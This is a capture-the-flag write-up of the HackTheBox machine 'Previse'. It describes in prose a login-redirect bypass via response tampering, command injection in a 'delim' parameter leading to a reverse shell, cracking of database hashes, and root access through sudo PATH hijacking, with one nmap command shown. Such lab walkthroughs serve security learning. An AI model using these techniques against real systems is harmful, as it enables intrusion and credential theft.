HackTheBox Writeup — Previse

Hello Guys , I am Faisal Husaini. My username on HTB is “fa1sal” . Also join me on discord.

The IP of this box is 10.10.11.104

Port Scan / Enumeration

nmap -sC -sV -p- -Pn --min-rate=10000 -oN nmap 10.10.11.104

Way to User

Checking the web, we get redirected to a login page

Running Gobuster scan against the web server leads us to multiple files with 302 status codes

Trying to each on of them redirects back to the login page as usual, so intercepting the request for accounts.php file

Intercepting the response to the request and finding that it redirects to login.php page as well

Changing the status code from 302 Found to 200 OK in the response and forwarding the request

The login page redirection was successfully bypassed and then got access to the accounts.php page for that particular request and it can be seen that a new user can be registered from the page

Adding a new user and then intercepting the request once again

Intercepting the response to the request once again and changing the status code to be able to register the user instead of getting redirected back to the login page

To avoid manually doing all these steps, we can add a match and replace in the burp settings for all of the pages

My new user is created successfullly

After login with my new user, I can access some more functionalities of the web page, interesting one being the Files section where the site backup file can be found for download

Getting the site backup file to my local machine and then unzipping it

One of the files named config.php leads to database credentials but at the moment these credentials cannot be used anywhere with no access

Another file named logs.php leads to something interesting as it uses the exec function without any sanitization and accepts a post parameter named delim inside it

Intercepting the request of logs.php file in the web

Changing the request from GET to POST and adding the delim parameter with the value of ping back command to our local machine

TCPDump command confirms the command execution as we get pinged back

Changing the value to the payload of reverse shell this time

Getting reverse shell successfully on my netcat listener

Finding the user flag on the home folder of m4lwhere user

Checking for locally open ports, we can see that port for mysql database is open

So using the credentials we got before from config.php to login into the database as root user

Dumping the user and its hashes successfully from the database

Using John to crack the hash of the user m4lwhere successfully

Switching to the new user using the su command

Way to Root

Running sudo -l command, we can see that the user m4lwhere can run sudo on access_backup.sh file

Checking the contents of the file, we can see that it is running gzip command and also execute the date command as well, since the path of both the commands are not specified, it makes them both vulnerable to path hijacking

So first I am changing the PATH environment variable to the current user’s home directory

Creating a file called as date and adding my reverse shell payload inside it and making the file fully executable

Running the script with sudo privileges leads us to reverse shell as root on my netcat listener successfully

The root flag is found on the /root directory

--

--

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover

Get the Medium app

A button that says 'Download on the App Store', and if clicked it will lead you to the iOS App store
A button that says 'Get it on, Google Play', and if clicked it will lead you to the Google Play store
Faisal Husaini

Hacker | Red Teamer | Python Coder | Gamer | Reverse Engineering Lover